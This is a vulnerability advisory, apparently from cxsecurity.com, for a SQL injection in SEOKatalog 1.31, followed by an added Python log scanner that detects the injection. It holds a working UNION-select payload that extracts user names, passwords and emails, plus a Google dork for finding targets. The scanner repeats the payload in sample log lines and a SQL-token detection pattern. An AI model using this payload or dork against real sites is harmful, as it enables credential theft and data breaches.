Bug: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability


Published: 2012.06.04
Credit: Smugller
Risk: Medium
CWE: CWE-89
CVE: N/A
Local: No
Remote: Yes
Dork: intext:"Powered by SEOKatalog 1.31"

#################
# SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
#################
# Exploit Title: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
# Version: <= 1.31 #
# Vendor: http://www.seokatalogi.pl/ #
# Category: webapps #
# Date: 08.09.2011 #
# Author: Smugller #
# Contact: smugll3r[alt+64]gmail.com #
# Group: DevilTeam #
# Website: http://devilteam.pl #
# From: Poland #
# Google Dork: intext:"Powered by SEOKatalog 1.31" #
#################

# Exploit:
http://site.com/index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2,3,4,5,6,7,8,9,group_concat(0x3c62722f3e,nick,0x3a,pass,0x3a,email,0x3c62722f3e),11,12+from+seokat_users--
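
A defensive check for the request shape shown above, as an added example that is not part of the original advisory: it scans web-server access logs for index.php?action=site_cat requests whose id, id_site or cat value is not a plain integer. That these parameters are integer ids, the combined log format and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Jun/2012:10:00:01 +0000] "GET /index.php?action=site_cat&cat=3&id_site=12&id=5 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Jun/2012:10:00:09 +0000] "GET /index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2+from+seokat_users-- HTTP/1.1" 200 9001',
    '198.51.100.9 - - [04/Jun/2012:10:00:12 +0000] "GET /index.php?action=site_cat&id=%2D1%20UNION%20SELECT%201 HTTP/1.1" 200 812',
    '203.0.113.4 - - [04/Jun/2012:10:01:00 +0000] "GET /index.php?action=contact HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: these query parameters are expected to carry integer ids only.
NUMERIC_PARAMS = ("id", "id_site", "cat")
SQL_TOKENS = re.compile(r"\b(union|select|from|group_concat)\b|--|/\*", re.I)


def check_line(line):
    """Return (client, findings) for a suspicious site_cat request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/index.php"):
        return None
    # parse_qs URL-decodes values, so '+' and %xx encodings are normalised.
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("action") != ["site_cat"]:
        return None
    findings = []
    for name in NUMERIC_PARAMS:
        for value in params.get(name, []):
            # Blank values are allowed; anything else must be ASCII digits.
            if value and not re.fullmatch(r"[0-9]+", value):
                kind = "sql-tokens" if SQL_TOKENS.search(value) else "non-integer"
                findings.append((name, kind, value))
    return (client, findings) if findings else None


def scan(lines):
    """Collect all suspicious requests from an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit]


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, findings)
```

The same integer-only rule applied at the application or WAF layer rejects the request before it reaches the database query.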

References:

http://devilteam.pl
http://www.seokatalogi.pl/

Copyright 2014, cxsecurity.com